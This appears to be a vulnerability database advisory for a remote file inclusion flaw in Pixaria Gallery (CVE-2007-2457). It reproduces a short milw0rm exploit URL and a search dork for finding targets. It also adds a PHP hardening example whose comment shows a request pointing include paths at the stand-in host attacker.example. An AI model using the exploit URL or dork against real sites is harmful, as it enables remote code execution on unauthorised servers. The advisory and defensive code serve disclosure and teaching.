Pixaria Gallery 'Class.Smarty.PHP' Remote File Include Vulnerability

Vulnerability ID 1112713 Vulnerability type Code injection
Published 2007-04-14 Updated 2007-05-04
CVE CVE-2007-2457 CNNVD-ID CNNVD-200705-048
Platform PHP CVSS score 7.5
|Source
https://www.exploit-db.com/exploits/3733
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200705-048
|Details
A PHP remote file inclusion vulnerability exists in resources/includes/class.Smarty.php in Pixaria Gallery. A remote attacker can execute arbitrary PHP code by supplying a URL in the cfg[sys][base_path] parameter. The quoted include builds its path from $cfg['sys']['base_path'], which a request can populate when PHP's register_globals setting is enabled; fetching and executing a remote file additionally requires the PHP configuration to permit URL includes (allow_url_fopen on the PHP versions of the time, allow_url_include from PHP 5.2 onward).
|Exploit
Pixaria Gallery 1.x (class.Smarty.php) Remote File Include Vulnerability

-----------------------------------------------------------------------------------------
# scripts       : Pixaria Gallery 1.x
# Discovered By : irvian
# scripts site  : http://pixaria.com/
# Thanks To     : #hitamputih  #nyubicrew  #patihack
# special To    : nyubi,ibnusina,arioo,jipank,kacung,trangkil,cah_gemblunkz
# dork          : powered by Pixaria. Gallery
-----------------------------------------------------------------------------------------
bug found:

/resources/includes/class.Smarty.php
// Load the main Smarty class
require_once ($cfg['sys']['base_path'] . "resources/smarty/libs/Smarty.class.php");


Exploit: http://www.target.com/resources/includes/class.Smarty.php?cfg[sys][base_path]=[evilcode] 

# milw0rm.com [2007-04-14]
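The following is an added example, not code from Pixaria Gallery or from the exploit author. It places the include pattern quoted above next to a hardened replacement that derives the base path from the file's own location and refuses anything that is not a local file under the install root. The install layout is assumed from the paths in the advisory (this file at <install>/resources/includes/, the Smarty library at <install>/resources/smarty/libs/), and the function names and the sample attacker value are illustrative.

```php
<?php
// Added example, not Pixaria's code. Assumed layout (from the advisory's paths):
//   <install>/resources/includes/class.Smarty.php    (this file)
//   <install>/resources/smarty/libs/Smarty.class.php (the include target)

// ---- Vulnerable pattern (mirrors the line quoted in the advisory) ----
// The path comes from $cfg['sys']['base_path']. With register_globals=On the
// query string ?cfg[sys][base_path]=http://attacker.example/ creates that array
// entry, and require_once() then fetches and executes
// http://attacker.example/resources/smarty/libs/Smarty.class.php
// (when the PHP configuration permits URL includes).
function vulnerable_smarty_path(array $cfg)
{
    return $cfg['sys']['base_path'] . "resources/smarty/libs/Smarty.class.php";
}

// Rejects stream-wrapper prefixes (http://, ftp://, php://, data:, ...) and NUL
// bytes, the ingredients of remote-include and null-byte truncation attacks.
// (On Windows a drive letter such as C: would also be rejected; the advisory's
// paths are Unix-style, so that is acceptable here.)
function is_local_path($path)
{
    if (strpos($path, "\0") !== false) {
        return false;
    }
    return !preg_match('#^[A-Za-z][A-Za-z0-9+.\-]*:#', $path);
}

// ---- Hardened replacement ----
// The base path is derived from where this file lives, never from a variable a
// request can populate, and the result must resolve to an existing file under
// the install root (realpath() also collapses any ../ sequences).
function hardened_smarty_path($thisFile = __FILE__)
{
    // <install>/resources/includes/class.Smarty.php -> <install>
    $installRoot = dirname(dirname(dirname($thisFile)));
    $candidate   = $installRoot . '/resources/smarty/libs/Smarty.class.php';

    if (!is_local_path($candidate)) {
        throw new RuntimeException('Refusing non-local include: ' . $candidate);
    }
    $real = realpath($candidate);
    $root = realpath($installRoot);
    if ($real === false || $root === false
        || strpos($real, $root . DIRECTORY_SEPARATOR) !== 0) {
        throw new RuntimeException('Smarty.class.php missing or outside install root: ' . $candidate);
    }
    return $real;
}

// Demonstration with a constructed attacker-style value (not a real request).
$cfg = array('sys' => array('base_path' => 'http://attacker.example/'));
echo "vulnerable include target: ", vulnerable_smarty_path($cfg), "\n";
echo "attacker value local? ", is_local_path($cfg['sys']['base_path']) ? 'yes' : 'no', "\n";
echo "/var/www/gallery/ local? ", is_local_path('/var/www/gallery/') ? 'yes' : 'no', "\n";
try {
    echo "hardened include target: ", hardened_smarty_path(), "\n";
} catch (RuntimeException $e) {
    // Outside a real Pixaria install the library file does not exist, so the
    // hardened version refuses instead of including something unexpected.
    echo "hardened include refused: ", $e->getMessage(), "\n";
}
```

The hardened version also removes the need for register_globals to be off for this file to be safe, but disabling register_globals and URL includes in php.ini remains the right server-wide setting; the path checks here are defence in depth for the include itself.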
|References

Source: BID
Name: 23489
Link: http://www.securityfocus.com/bid/23489
Source: www.pixaria.com
Link: http://www.pixaria.com/news/article/71/
Source: XF
Name: pixaria-classsmarty-file-include(33662)
Link: http://xforce.iss.net/xforce/xfdb/33662
Source: www.pixaria.com
Link: http://www.pixaria.com/news/article/70/
Source: MILW0RM
Name: 3733
Link: http://www.milw0rm.com/exploits/3733
Source: VUPEN
Name: ADV-2007-1390
Link: http://www.frsirt.com/english/advisories/2007/1390
Source: SECUNIA
Name: 24821
Link: http://secunia.com/advisories/24821
Source: pixaria.com
Link: http://pixaria.com/index.history.php
Source: OSVDB
Name: 34976
Link: http://osvdb.org/34976
Source: BUGTRAQ
Name: 20070414 Pixaria Gallery 1.0 (class.Smarty.php) Remote File Include Vulnerability
Link: http://www.securityfocus.com/archive/1/archive/1/465847/100/200/threaded